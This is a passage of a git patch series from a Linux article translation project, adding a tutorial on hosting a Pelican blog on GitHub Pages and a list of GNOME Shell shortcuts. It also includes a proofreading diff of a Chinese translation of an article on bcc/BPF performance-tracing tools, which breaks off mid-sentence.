venv venv + +``` +or as +``` + $ virtualenv --python + = + python3.5 venv + +``` +And activate it: +``` + $ + source + venv/bin/activate + +``` +Inside the virtualenv, you have to install pelican and it's dependencies. You should also install ghp-import (to help us with publishing to github) and Markdown (for writing your posts using markdown). It goes like this: +``` + (venv)$ pip install pelican markdown ghp-import + +``` +Once that is done, you can start creating your blog using pelican-quickstart: +``` + (venv)$ pelican-quickstart + +``` +Which will prompt us a series of questions. Before answering them, take a look at my answers below: +``` + > Where do you want to create your new web site? [.] ./ + > What will be the title of this web site? Renata's blog + > Who will be the author of this web site? Renata + > What will be the default language of this web site? [pt] en + > Do you want to specify a URL prefix? e.g., http://example.com (Y/n) n + > Do you want to enable article pagination? (Y/n) y + > How many articles per page do you want? [10] 10 + > What is your time zone? [Europe/Paris] America/Sao_Paulo + > Do you want to generate a Fabfile/Makefile to automate generation and publishing? (Y/n) Y **# PAY ATTENTION TO THIS!** + > Do you want an auto-reload & simpleHTTP script to assist with theme and site development? (Y/n) n + > Do you want to upload your website using FTP? (y/N) n + > Do you want to upload your website using SSH? (y/N) n + > Do you want to upload your website using Dropbox? (y/N) n + > Do you want to upload your website using S3? (y/N) n + > Do you want to upload your website using Rackspace Cloud Files? (y/N) n + > Do you want to upload your website using GitHub Pages? (y/N) y + > Is this your personal page (username.github.io)? (y/N) y + Done. Your new project is available at /home/username/YOUR_USERNAME.github.io + +``` +About the time zone, it should be specified as TZ Time zone (full list here: [List of tz database time zones][5]). +Now, go ahead and create your first blog post! You might want to open the project folder on your favorite code editor and find the "content" folder inside it. Then, create a new file, which can be called my-first-post.md (don't worry, this is just for testing, you can change it later). The contents should begin with the metadata which identifies the Title, Date, Category and more from the post before you start with the content, like this: +``` + .lang + = + "markdown" + + # DON'T COPY this line, it exists just for highlighting purposes + + + + Title: + + My + + first + + post + + + Date: + + 2017-11-26 + + 10:01 + + + Modified: + + 2017-11-27 + + 12:30 + + + Category: + + misc + + + Tags: + + first + , + + misc + + + Slug: + + My-first-post + + + Authors: + + Your + + name + + + Summary: + + What + + does + + your + + post + + talk + + about + ? + + Write + + here. + + + + This + + is + + the + + * + first + + post + * + + from + + my + + Pelican + + blog. + + ** + YAY + !** + + +``` +Let's see how it looks? +Go to the terminal, generate the static files and start the server. To do that, use the following command: +``` + (venv)$ make html && make serve + +``` +While this command is running, you should be able to visit it on your favorite web browser by typing localhost:8000 on the address bar. +![Screenshot of the blog home. It has a header with the title Renata\\'s blog, the first post on the left, info about the post on the right, links and social on the bottom.][6] +Pretty neat, right? +Now, what if you want to put an image in a post, how do you do that? Well, first you create a directory inside your content directory, where your posts are. Let's call this directory 'images' for easy reference. Now, you have to tell Pelican to use it. Find the pelicanconf.py, the file where you configure the system, and add a variable that contains the directory with your images: +``` + .lang + = + "python" + + # DON'T COPY this line, it exists just for highlighting purposes + + + + STATIC_PATHS + + = + + [ + ' + images + ' + ] + + +``` +Save it. Go to your post and add the image this way: +``` + .lang + = + "markdown" + + # DON'T COPY this line, it exists just for highlighting purposes + + + + ![ + Write + + here + + a + + good + + description + + for + + people + + who + + can + ' + t + + see + + the + + image + ]( + { + filename + }/ + images + / + IMAGE_NAME.jpg + ) + + +``` +You can interrupt the server at anytime pressing CTRL+C on the terminal. But you should start it again and check if the image is correct. Can you remember how? +``` + (venv)$ make html && make serve + +``` +One last step before your coding is "done": you should make sure anyone can read your posts using ATOM or RSS feeds. Find the pelicanconf.py, the file where you configure the system, and edit the part about feed generation: +``` + .lang + = + "python" + + # DON'T COPY this line, it exists just for highlighting purposes + + + + FEED_ALL_ATOM + + = + + ' + feeds + / + all.atom.xml + ' + + + FEED_ALL_RSS + + = + + ' + feeds + / + all.rss.xml + ' + + + AUTHOR_FEED_RSS + + = + + ' + feeds + / + %s.rss.xml + ' + + + RSS_FEED_SUMMARY_ONLY + + = + + False + + +``` +Save everything so you can send the code to Github. You can do that by adding all files, committing it with a message ('first commit') and using git push. You will be asked for your Github login and password. +``` + $ git add -A + && + git commit -a -m + 'first commit' + + && + git push --all + +``` +And... remember how at the very beginning I said you would be preserving the master branch for the output of the static files generated by Pelican? Now it's time for you to generate them: +``` + $ make github + +``` +You will be asked for your Github login and password again. And... voila! Your new blog should be live on https://YOUR_USERNAME.github.io. +If you had an error in any step of the way, please reread this tutorial, try and see if you can detect in which part the problem happened, because that is the first step to debbugging. Sometimes, even something simple like a typo or, with Python, a wrong indentation, can give us trouble. Shout out and ask for help online or on your community. +For tips on how to write your posts using Markdown, you should read the [Daring Fireball Markdown guide][7]. +To get other themes, I recommend you visit [Pelican Themes][8]. +This post was adapted from [Adrien Leger's Create a github hosted Pelican blog with a Bootstrap3 theme][9]. I hope it was somewhat useful for you. + +-------------------------------------------------------------------------------- + +via: https://rsip22.github.io/blog/create-a-blog-with-pelican-and-github-pages.html + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rsip22.github.io +[1]https://rsip22.github.io/blog/category/blog.html +[2]https://tutorial.djangogirls.org +[3]https://rsip22.github.io/blog/img/create_github_repository.png +[4]https://www.gnu.org/licenses/license-list.html +[5]https://en.wikipedia.org/wiki/List_of_tz_database_time_zones +[6]https://rsip22.github.io/blog/img/blog_screenshot.png +[7]https://daringfireball.net/projects/markdown/syntax +[8]http://www.pelicanthemes.com/ +[9]https://a-slide.github.io/blog/github-pelican From edbce0ef746dcf3196d81a5224e656bcb8a0ac1c Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 13 Dec 2017 11:29:55 +0800 Subject: [PATCH 0523/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Creating=20a=20?= =?UTF-8?q?blog=20with=20pelican=20and=20Github=20pages?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ng a blog with pelican and Github pages.md | 186 ++++++++++++++++++ 1 file changed, 186 insertions(+) create mode 100644 sources/tech/20171213 Creating a blog with pelican and Github pages.md diff --git a/sources/tech/20171213 Creating a blog with pelican and Github pages.md b/sources/tech/20171213 Creating a blog with pelican and Github pages.md new file mode 100644 index 0000000000..ef3bf36a9b --- /dev/null +++ b/sources/tech/20171213 Creating a blog with pelican and Github pages.md @@ -0,0 +1,186 @@ +Creating a blog with pelican and Github pages +====== + +Today I'm going to talk about how this blog was created. Before we begin, I expect you to be familiarized with using Github and creating a Python virtual enviroment to develop. If you aren't, I recommend you to learn with the [Django Girls tutorial][2], which covers that and more. + +This is a tutorial to help you publish a personal blog hosted by Github. For that, you will need a regular Github user account (instead of a project account). + +The first thing you will do is to create the Github repository where your code will live. If you want your blog to point to only your username (like rsip22.github.io) instead of a subfolder (like rsip22.github.io/blog), you have to create the repository with that full name. + +![Screenshot of Github, the menu to create a new repository is open and a new repo is being created with the name 'rsip22.github.io'][3] + +I recommend that you initialize your repository with a README, with a .gitignore for Python and with a [free software license][4]. If you use a free software license, you still own the code, but you make sure that others will benefit from it, by allowing them to study it, reuse it and, most importantly, keep sharing it. + +Now that the repository is ready, let's clone it to the folder you will be using to store the code in your machine: +``` + $ git clone https://github.com/YOUR_USERNAME/YOUR_USERNAME.github.io.git + +``` + +And change to the new directory: +``` + $ cd YOUR_USERNAME.github.io + +``` + +Because of how Github Pages prefers to work, serving the files from the master branch, you have to put your source code in a new branch, preserving the "master" for the output of the static files generated by Pelican. To do that, you must create a new branch called "source": +``` + $ git checkout -b source + +``` + +Create the virtualenv with the Python3 version installed on your system. + +On GNU/Linux systems, the command might go as: +``` + $ python3 -m venv venv + +``` + +or as +``` + $ virtualenv --python=python3.5 venv + +``` + +And activate it: +``` + $ source venv/bin/activate + +``` + +Inside the virtualenv, you have to install pelican and it's dependencies. You should also install ghp-import (to help us with publishing to github) and Markdown (for writing your posts using markdown). It goes like this: +``` + (venv)$ pip install pelican markdown ghp-import + +``` + +Once that is done, you can start creating your blog using pelican-quickstart: +``` + (venv)$ pelican-quickstart + +``` + +Which will prompt us a series of questions. Before answering them, take a look at my answers below: +``` + > Where do you want to create your new web site? [.] ./ + > What will be the title of this web site? Renata's blog + > Who will be the author of this web site? Renata + > What will be the default language of this web site? [pt] en + > Do you want to specify a URL prefix? e.g., http://example.com (Y/n) n + > Do you want to enable article pagination? (Y/n) y + > How many articles per page do you want? [10] 10 + > What is your time zone? [Europe/Paris] America/Sao_Paulo + > Do you want to generate a Fabfile/Makefile to automate generation and publishing? (Y/n) Y **# PAY ATTENTION TO THIS!** + > Do you want an auto-reload & simpleHTTP script to assist with theme and site development? (Y/n) n + > Do you want to upload your website using FTP? (y/N) n + > Do you want to upload your website using SSH? (y/N) n + > Do you want to upload your website using Dropbox? (y/N) n + > Do you want to upload your website using S3? (y/N) n + > Do you want to upload your website using Rackspace Cloud Files? (y/N) n + > Do you want to upload your website using GitHub Pages? (y/N) y + > Is this your personal page (username.github.io)? (y/N) y + Done. Your new project is available at /home/username/YOUR_USERNAME.github.io + +``` + +About the time zone, it should be specified as TZ Time zone (full list here: [List of tz database time zones][5]). + +Now, go ahead and create your first blog post! You might want to open the project folder on your favorite code editor and find the "content" folder inside it. Then, create a new file, which can be called my-first-post.md (don't worry, this is just for testing, you can change it later). The contents should begin with the metadata which identifies the Title, Date, Category and more from the post before you start with the content, like this: +``` + .lang="markdown" # DON'T COPY this line, it exists just for highlighting purposes + Title: My first post + Date: 2017-11-26 10:01 + Modified: 2017-11-27 12:30 + Category: misc + Tags: first , misc + Slug: My-first-post + Authors: Your name + Summary: What does your post talk about ? Write here. + + This is the *first post* from my Pelican blog. ** YAY !** +``` + +Let's see how it looks? + +Go to the terminal, generate the static files and start the server. To do that, use the following command: +``` + (venv)$ make html && make serve +``` + +While this command is running, you should be able to visit it on your favorite web browser by typing localhost:8000 on the address bar. + +![Screenshot of the blog home. It has a header with the title Renata\\'s blog, the first post on the left, info about the post on the right, links and social on the bottom.][6] + +Pretty neat, right? + +Now, what if you want to put an image in a post, how do you do that? Well, first you create a directory inside your content directory, where your posts are. Let's call this directory 'images' for easy reference. Now, you have to tell Pelican to use it. Find the pelicanconf.py, the file where you configure the system, and add a variable that contains the directory with your images: +``` + .lang="python" # DON'T COPY this line, it exists just for highlighting purposes + STATIC_PATHS = ['images'] + +``` + +Save it. Go to your post and add the image this way: +``` + .lang="markdown" # DON'T COPY this line, it exists just for highlighting purposes + ![Write here a good description for people who can ' t see the image]({filename}/images/IMAGE_NAME.jpg) + +``` + +You can interrupt the server at anytime pressing CTRL+C on the terminal. But you should start it again and check if the image is correct. Can you remember how? +``` + (venv)$ make html && make serve +``` + +One last step before your coding is "done": you should make sure anyone can read your posts using ATOM or RSS feeds. Find the pelicanconf.py, the file where you configure the system, and edit the part about feed generation: +``` + .lang="python" # DON'T COPY this line, it exists just for highlighting purposes + FEED_ALL_ATOM = 'feeds/all.atom.xml' + FEED_ALL_RSS = 'feeds/all.rss.xml' + AUTHOR_FEED_RSS = 'feeds/%s.rss.xml' + RSS_FEED_SUMMARY_ONLY = False +``` + +Save everything so you can send the code to Github. You can do that by adding all files, committing it with a message ('first commit') and using git push. You will be asked for your Github login and password. +``` + $ git add -A && git commit -a -m 'first commit' && git push --all + +``` + +And... remember how at the very beginning I said you would be preserving the master branch for the output of the static files generated by Pelican? Now it's time for you to generate them: +``` + $ make github + +``` + +You will be asked for your Github login and password again. And... voila! Your new blog should be live on https://YOUR_USERNAME.github.io. + +If you had an error in any step of the way, please reread this tutorial, try and see if you can detect in which part the problem happened, because that is the first step to debbugging. Sometimes, even something simple like a typo or, with Python, a wrong indentation, can give us trouble. Shout out and ask for help online or on your community. + +For tips on how to write your posts using Markdown, you should read the [Daring Fireball Markdown guide][7]. + +To get other themes, I recommend you visit [Pelican Themes][8]. + +This post was adapted from [Adrien Leger's Create a github hosted Pelican blog with a Bootstrap3 theme][9]. I hope it was somewhat useful for you. + +-------------------------------------------------------------------------------- + +via: https://rsip22.github.io/blog/create-a-blog-with-pelican-and-github-pages.html + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://rsip22.github.io +[1]https://rsip22.github.io/blog/category/blog.html +[2]https://tutorial.djangogirls.org +[3]https://rsip22.github.io/blog/img/create_github_repository.png +[4]https://www.gnu.org/licenses/license-list.html +[5]https://en.wikipedia.org/wiki/List_of_tz_database_time_zones +[6]https://rsip22.github.io/blog/img/blog_screenshot.png +[7]https://daringfireball.net/projects/markdown/syntax +[8]http://www.pelicanthemes.com/ +[9]https://a-slide.github.io/blog/github-pelican From d8d94b43a4d6984641db7312f115021f123c52c0 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 13 Dec 2017 14:32:20 +0800 Subject: [PATCH 0524/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Useful=20GNOME?= =?UTF-8?q?=20Shell=20Keyboard=20Shortcuts=20You=20Might=20Not=20Know=20Ab?= =?UTF-8?q?out?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...oard Shortcuts You Might Not Know About.md | 77 +++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md diff --git a/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md b/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md new file mode 100644 index 0000000000..17f657647d --- /dev/null +++ b/sources/tech/20171120 Useful GNOME Shell Keyboard Shortcuts You Might Not Know About.md @@ -0,0 +1,77 @@ +Useful GNOME Shell Keyboard Shortcuts You Might Not Know About +====== +As Ubuntu has moved to Gnome Shell in its 17.10 release, many users may be interested to discover some of the most useful shortcuts in Gnome as well as how to create your own shortcuts. This article will explain both. + +If you expect GNOME to ship with hundreds or thousands of shell shortcuts, you will be disappointed to learn this isn't the case. The list of shortcuts isn't miles long, and not all of them will be useful to you, but there are still many keyboard shortcuts you can take advantage of. + +![gnome-shortcuts-01-settings][1] + +![gnome-shortcuts-01-settings][1] + +To access the list of shortcuts, go to "Settings -> Devices -> Keyboard." Here are some less popular, yet useful shortcuts. + + * Ctrl + Alt + T - this combination launches the terminal; you can use this from anywhere within GNOME + + + +Two shortcuts I personally use quite frequently are: + + * Alt + F4 - close the window on focus + * Alt + F8 - resize the window + + +Most of you know how to switch between open applications (Alt + Tab), but you may not know you can use Alt + Shift + Tab to cycle through applications in reverse direction. + +Another useful combination for switching within the windows of an application is Alt + (key above Tab) (example: Alt + ` on a US keyboard). + +If you want to show the Activities overview, use Alt + F1. + +There are quite a lot of shortcuts related to workspaces. If you are like me and don't use multiple workspaces frequently, these shortcuts are useless to you. Still, some of the ones worth noting are the following: + + * Super + PageUp (or PageDown) moves to the workspace above or below + * Ctrl + Alt + Left (or Right) moves to the workspace on the left/right + +If you add Shift to these commands, e.g. Shift + Ctrl + Alt + Left, you move the window one worskpace above, below, to the left, or to the right. + +Another favorite keyboard shortcut of mine is in the Accessibility section - Increase/Decrease Text Size. You can use Ctrl + + (and Ctrl + -) to zoom text size quickly. In some cases, this may be disabled by default, so do check it out before you try it. + +The above-mentioned shortcuts are lesser known, yet useful keyboard shortcuts. If you are curious to see what else is available, you can check [the official GNOME shell cheat sheet][2]. + +If the default shortcuts are not to your liking, you can change them or create new ones. You do this from the same "Settings -> Devices -> Keyboard" dialog. Just select the entry you want to change, and the following dialog will popup. + +![gnome-shortcuts-02-change-shortcut][3] + +![gnome-shortcuts-02-change-shortcut][3] + +Enter the keyboard combination you want. + +![gnome-shortcuts-03-set-shortcut][4] + +![gnome-shortcuts-03-set-shortcut][4] + +If it is already in use you will get a message. If not, just click Set, and you are done. + +If you want to add new shortcuts rather than change existing ones, scroll down until you see the "Plus" sign, click it, and in the dialog that appears, enter the name and keys of your new keyboard shortcut. + +![gnome-shortcuts-04-add-custom-shortcut][5] + +![gnome-shortcuts-04-add-custom-shortcut][5] + +GNOME doesn't come with tons of shell shortcuts by default, and the above listed ones are some of the more useful ones. If these shortcuts are not enough for you, you can always create your own. Let us know if this is helpful to you. + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/ + +作者:[Ada Ivanova][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/adaivanoff/ +[1]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings) +[2]https://wiki.gnome.org/Projects/GnomeShell/CheatSheet +[3]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut) +[4]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut) +[5]https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut) From 804ce4725a575fb0d7a55c8169d529c7e0aed973 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 13 Dec 2017 14:53:19 +0800 Subject: [PATCH 0525/1627] PRF:20171207 7 tools for analyzing performance in Linux with bccBPF.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yongshouzhang 非常棒的一篇文章,翻译的也不错,不过后面部分有些疏忽。 --- ...lyzing performance in Linux with bccBPF.md | 175 ++++++++---------- 1 file changed, 77 insertions(+), 98 deletions(-) diff --git a/translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md b/translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md index 4e55ed979a..7bba3778ff 100644 --- a/translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md +++ b/translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md @@ -1,50 +1,31 @@ -translating by yongshouzhang - - -7个 Linux 下使用 bcc/BPF 的性能分析工具 +7 个使用 bcc/BPF 的性能分析神器 ============================================================ -###使用伯克利的包过滤(BPF)编译器集合(BCC)工具深度探查你的 linux 代码。 +> 使用伯克利包过滤器Berkeley Packet Filter(BPF)编译器集合Compiler Collection(BCC)工具深度探查你的 linux 代码。 - [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/pictures/brendan_face2017_620d.jpg?itok=xZzBQNcY)][7] 21 Nov 2017 [Brendan Gregg][8] [Feed][9] - -43[up][10] - - [4 comments][11] ![7 superpowers for Fedora bcc/BPF performance analysis](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/penguins%20in%20space_0.jpg?itok=umpCTAul) -图片来源 : +在 Linux 中出现的一种新技术能够为系统管理员和开发者提供大量用于性能分析和故障排除的新工具和仪表盘。它被称为增强的伯克利数据包过滤器enhanced Berkeley Packet Filter(eBPF,或 BPF),虽然这些改进并不是由伯克利开发的,而且它们不仅仅是处理数据包,更多的是过滤。我将讨论在 Fedora 和 Red Hat Linux 发行版中使用 BPF 的一种方法,并在 Fedora 26 上演示。 -opensource.com +BPF 可以在内核中运行由用户定义的沙盒程序,可以立即添加新的自定义功能。这就像按需给 Linux 系统添加超能力一般。 你可以使用它的例子包括如下: -在 linux 中出现的一种新技术能够为系统管理员和开发者提供大量用于性能分析和故障排除的新工具和仪表盘。 它被称为增强的伯克利数据包过滤器(eBPF,或BPF),虽然这些改进并不由伯克利开发,它们不仅仅是处理数据包,更多的是过滤。我将讨论在 Fedora 和 Red Hat Linux 发行版中使用 BPF 的一种方法,并在 Fedora 26 上演示。 +* **高级性能跟踪工具**:对文件系统操作、TCP 事件、用户级事件等的可编程的低开销检测。 +* **网络性能**: 尽早丢弃数据包以提高对 DDoS 的恢复能力,或者在内核中重定向数据包以提高性能。 +* **安全监控**: 7x24 小时的自定义检测和记录内核空间与用户空间内的可疑事件。 -BPF 可以在内核中运行用户定义的沙盒程序,以立即添加新的自定义功能。这就像可按需给 Linux 系统添加超能力一般。 你可以使用它的例子包括如下: - -* 高级性能跟踪工具:文件系统操作、TCP事件、用户级事件等的编程低开销检测。 - -* 网络性能 : 尽早丢弃数据包以提高DDoS的恢复能力,或者在内核中重定向数据包以提高性能。 - -* 安全监控 : 24x7 小时全天候自定义检测和记录内核空间与用户空间内的可疑事件。 - -在可能的情况下,BPF 程序必须通过一个内核验证机制来保证它们的安全运行,这比写自定义的内核模块更安全。我在此假设大多数人并不编写自己的 BPF 程序,而是使用别人写好的。在 GitHub 上的 [BPF Compiler Collection (bcc)][12] 项目中,我已发布许多开源代码。bcc 提供不同的 BPF 开发前端支持,包括Python和Lua,并且是目前最活跃的 BPF 模具项目。 +在可能的情况下,BPF 程序必须通过一个内核验证机制来保证它们的安全运行,这比写自定义的内核模块更安全。我在此假设大多数人并不编写自己的 BPF 程序,而是使用别人写好的。在 GitHub 上的 [BPF Compiler Collection (bcc)][12] 项目中,我已发布许多开源代码。bcc 为 BPF 开发提供了不同的前端支持,包括 Python 和 Lua,并且是目前最活跃的 BPF 工具项目。 ### 7 个有用的 bcc/BPF 新工具 -为了了解BCC / BPF工具和他们的乐器,我创建了下面的图表并添加到项目中 -To understand the bcc/BPF tools and what they instrument, I created the following diagram and added it to the bcc project: - -### [bcc_跟踪工具.png][13] +为了了解 bcc/BPF 工具和它们的检测内容,我创建了下面的图表并添加到 bcc 项目中。 ![Linux bcc/BPF 跟踪工具图](https://opensource.com/sites/default/files/u128651/bcc_tracing_tools.png) -Brendan Gregg, [CC BY-SA 4.0][14] +这些是命令行界面工具,你可以通过 SSH 使用它们。目前大多数分析,包括我的老板,都是用 GUI 和仪表盘进行的。SSH 是最后的手段。但这些命令行工具仍然是预览 BPF 能力的好方法,即使你最终打算通过一个可用的 GUI 使用它。我已着手向一个开源 GUI 添加 BPF 功能,但那是另一篇文章的主题。现在我想向你分享今天就可以使用的 CLI 工具。 -这些是命令行界面工具,你可以通过 SSH (安全外壳)使用它们。目前大多数分析,包括我的老板,是用 GUIs 和仪表盘进行的。SSH是最后的手段。但这些命令行工具仍然是预览BPF能力的好方法,即使你最终打算通过一个可用的 GUI 使用它。我已着手向一个开源 GUI 添加BPF功能,但那是另一篇文章的主题。现在我想分享你今天可以使用的 CLI 工具。 +#### 1、 execsnoop -### 1\. execsnoop - -从哪儿开始? 如何查看新的进程。这些可以消耗系统资源,但很短暂,它们不会出现在 top(1)命令或其他工具中。 这些新进程可以使用[execsnoop] [15]进行检测(或使用行业术语,可以追踪)。 在追踪时,我将在另一个窗口中通过 SSH 登录: +从哪儿开始呢?如何查看新的进程。那些会消耗系统资源,但很短暂的进程,它们甚至不会出现在 `top(1)` 命令或其它工具中的显示之中。这些新进程可以使用 [execsnoop][15] 进行检测(或使用行业术语说,可以被追踪traced)。 在追踪时,我将在另一个窗口中通过 SSH 登录: ``` # /usr/share/bcc/tools/execsnoop @@ -67,13 +48,14 @@ grep 12255 12254 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COL grepconf.sh 12256 12239 0 /usr/libexec/grepconf.sh -c grep 12257 12256 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS ``` -哇。 那是什么? 什么是grepconf.sh? 什么是 /etc/GREP_COLORS? 而且 grep通过运行自身阅读它自己的配置文件? 这甚至是如何工作的? -欢迎来到有趣的系统追踪世界。 你可以学到很多关于系统是如何工作的(或者一些情况下根本不工作),并且发现一些简单的优化。 execsnoop 通过跟踪 exec()系统调用来工作,exec() 通常用于在新进程中加载不同的程序代码。 +哇哦。 那是什么? 什么是 `grepconf.sh`? 什么是 `/etc/GREP_COLORS`? 是 `grep` 在读取它自己的配置文件……由 `grep` 运行的? 这究竟是怎么工作的? -### 2\. opensnoop +欢迎来到有趣的系统追踪世界。 你可以学到很多关于系统是如何工作的(或者根本不工作,在有些情况下),并且发现一些简单的优化方法。 `execsnoop` 通过跟踪 `exec()` 系统调用来工作,`exec()` 通常用于在新进程中加载不同的程序代码。 -从上面继续,所以,grepconf.sh可能是一个shell脚本,对吧? 我将运行file(1)来检查,并使用[opensnoop][16] bcc 工具来查看打开的文件: +#### 2、 opensnoop + +接着上面继续,所以,`grepconf.sh` 可能是一个 shell 脚本,对吧? 我将运行 `file(1)` 来检查它,并使用[opensnoop][16] bcc 工具来查看打开的文件: ``` # /usr/share/bcc/tools/opensnoop @@ -91,18 +73,20 @@ PID COMM FD ERR PATH 1 systemd 16 0 /proc/565/cgroup 1 systemd 16 0 /proc/536/cgroup ``` -像execsnoop和opensnoop这样的工具每个事件打印一行。上图显示 file(1)命令当前打开(或尝试打开)的文件:返回的文件描述符(“FD”列)对于 /etc/magic.mgc 是-1,而“ERR”列指示它是“文件未找到”。我不知道该文件,也不知道 file(1)正在读取的 /usr/share/misc/magic.mgc 文件。我不应该感到惊讶,但是 file(1)在识别文件类型时没有问题: + +像 `execsnoop` 和 `opensnoop` 这样的工具会将每个事件打印一行。上图显示 `file(1)` 命令当前打开(或尝试打开)的文件:返回的文件描述符(“FD” 列)对于 `/etc/magic.mgc` 是 -1,而 “ERR” 列指示它是“文件未找到”。我不知道该文件,也不知道 `file(1)` 正在读取的 `/usr/share/misc/magic.mgc` 文件是什么。我不应该感到惊讶,但是 `file(1)` 在识别文件类型时没有问题: ``` # file /usr/share/misc/magic.mgc /etc/magic /usr/share/misc/magic.mgc: magic binary file for file(1) cmd (version 14) (little endian) /etc/magic: magic text file for file(1) cmd, ASCII text ``` -opensnoop通过跟踪 open()系统调用来工作。为什么不使用 strace -feopen file 命令呢? 这将在这种情况下起作用。然而,opensnoop 的一些优点在于它能在系统范围内工作,并且跟踪所有进程的 open()系统调用。注意上例的输出中包括了从systemd打开的文件。Opensnoop 也应该有更低的开销:BPF 跟踪已经被优化,并且当前版本的 strace(1)仍然使用较老和较慢的 ptrace(2)接口。 -### 3\. xfsslower +`opensnoop` 通过跟踪 `open()` 系统调用来工作。为什么不使用 `strace -feopen file` 命令呢? 在这种情况下是可以的。然而,`opensnoop` 的一些优点在于它能在系统范围内工作,并且跟踪所有进程的 `open()` 系统调用。注意上例的输出中包括了从 systemd 打开的文件。`opensnoop` 应该系统开销更低:BPF 跟踪已经被优化过,而当前版本的 `strace(1)` 仍然使用较老和较慢的 `ptrace(2)` 接口。 -bcc/BPF 不仅仅可以分析系统调用。[xfsslower][17] 工具跟踪具有大于1毫秒(参数)延迟的常见XFS文件系统操作。 +#### 3、 xfsslower + +bcc/BPF 不仅仅可以分析系统调用。[xfsslower][17] 工具可以跟踪大于 1 毫秒(参数)延迟的常见 XFS 文件系统操作。 ``` # /usr/share/bcc/tools/xfsslower 1 @@ -119,15 +103,16 @@ TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME 14:17:46 cksum 4168 R 65536 128 1.01 grub2-fstest [...] ``` -在上图输出中,我捕获了多个延迟超过 1 毫秒 的 cksum(1)读数(字段“T”等于“R”)。这个工作是在 xfsslower 工具运行的时候,通过在 XFS 中动态地设置内核函数实现,当它结束的时候解除检测。其他文件系统也有这个 bcc 工具的版本:ext4slower,btrfsslower,zfsslower 和 nfsslower。 -这是个有用的工具,也是 BPF 追踪的重要例子。对文件系统性能的传统分析主要集中在块 I/O 统计信息 - 通常你看到的是由 iostat(1)工具打印并由许多性能监视 GUI 绘制的图表。这些统计数据显示了磁盘如何执行,但不是真正的文件系统。通常比起磁盘你更关心文件系统的性能,因为应用程序是在文件系统中发起请求和等待。并且文件系统的性能可能与磁盘的性能大为不同!文件系统可以完全从内存缓存中读取数据,也可以通过预读算法和回写缓存填充缓存。xfsslower 显示了文件系统的性能 - 应用程序直接体验到什么。这对于免除整个存储子系统通常是有用的; 如果确实没有文件系统延迟,那么性能问题很可能在别处。 +在上图输出中,我捕获到了多个延迟超过 1 毫秒 的 `cksum(1)` 读取操作(字段 “T” 等于 “R”)。这是在 `xfsslower` 工具运行的时候,通过在 XFS 中动态地检测内核函数实现的,并当它结束的时候解除该检测。这个 bcc 工具也有其它文件系统的版本:`ext4slower`、`btrfsslower`、`zfsslower` 和 `nfsslower`。 -### 4\. biolatency +这是个有用的工具,也是 BPF 追踪的重要例子。对文件系统性能的传统分析主要集中在块 I/O 统计信息 —— 通常你看到的是由 `iostat(1)` 工具输出,并由许多性能监视 GUI 绘制的图表。这些统计数据显示的是磁盘如何执行,而不是真正的文件系统如何执行。通常比起磁盘来说,你更关心的是文件系统的性能,因为应用程序是在文件系统中发起请求和等待。并且,文件系统的性能可能与磁盘的性能大为不同!文件系统可以完全从内存缓存中读取数据,也可以通过预读算法和回写缓存来填充缓存。`xfsslower` 显示了文件系统的性能 —— 这是应用程序直接体验到的性能。通常这对于排除整个存储子系统的问题是有用的;如果确实没有文件系统延迟,那么性能问题很可能是在别处。 -虽然文件系统性能对于理解应用程序性能非常重要,但研究磁盘性能也是有好处的。当各种缓存技巧不能再隐藏其延迟时,磁盘的低性能终会影响应用程序。 磁盘性能也是容量规划研究的目标。 +#### 4、 biolatency -iostat(1)工具显示平均磁盘 I/O 延迟,但平均值可能会引起误解。 以直方图的形式研究 I/O 延迟的分布是有用的,这可以通过使用 [biolatency] 来实现[18]: +虽然文件系统性能对于理解应用程序性能非常重要,但研究磁盘性能也是有好处的。当各种缓存技巧都无法挽救其延迟时,磁盘的低性能终会影响应用程序。 磁盘性能也是容量规划研究的目标。 + +`iostat(1)` 工具显示了平均磁盘 I/O 